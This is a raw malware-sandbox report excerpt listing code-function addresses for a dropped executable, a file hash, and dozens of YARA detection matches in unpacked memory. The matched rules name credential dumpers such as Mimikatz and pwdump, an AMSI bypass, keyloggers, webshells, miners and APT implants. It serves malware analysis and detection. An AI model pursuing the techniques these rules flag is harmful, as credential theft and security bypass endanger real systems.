Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAD8E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9DE9
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91F6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F8DDD
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F81DB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F61D1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B136
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57C86BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57D3728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DD038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57CFF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57C9CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F15F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5837600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5839520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EC52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B580490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EA818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583B88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B58477FC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582F76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583C21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B580A288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E9278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EB20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B58534D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5852504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57C1420
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F6480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5842480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582E410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F0320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5825ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583BE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583DD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5822DD4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5841E00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5821D78
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57CB0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5837108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583C034
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5827050
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583D058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584B058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DDFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5845F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57D1FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EFFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DEFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F0AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583BA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EAA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583D9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57CB944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5841950
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583CCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F3CE0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E1D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583BC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E3C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F1C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5839B34

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe 9AAE447ECF7C9B42058153993D02DCC0EF2D92984A0987CF543E6E132740E2EA

Source: 38.3.MpSigStub.exe.138bd31742c.64.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd21de7c.219.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bd21de7c.147.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb7ebd.124.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd223b1a.220.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.220.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 38.3.MpSigStub.exe.138bdbb68b9.152.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138be3e1c0a.122.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bcde53e1.182.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bdbb54b5.151.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 38.3.MpSigStub.exe.138be2d6086.59.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138be2d6086.59.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 38.3.MpSigStub.exe.138bd61fbe2.56.unpack, type: UNPACKEDPE	Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 38.3.MpSigStub.exe.138bce14cd2.18.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 38.3.MpSigStub.exe.138be8f860a.191.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138be22418a.58.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd223b1a.210.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.210.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 38.3.MpSigStub.exe.138bdfb53f6.20.unpack, type: UNPACKEDPE	Matched rule: Msfpayloads_msf_10 date = 2017-02-09, hash1 = 3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082, author = Florian Roth, description = Metasploit Payloads - file msf.exe, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb68b9.126.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd4f6df4.69.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
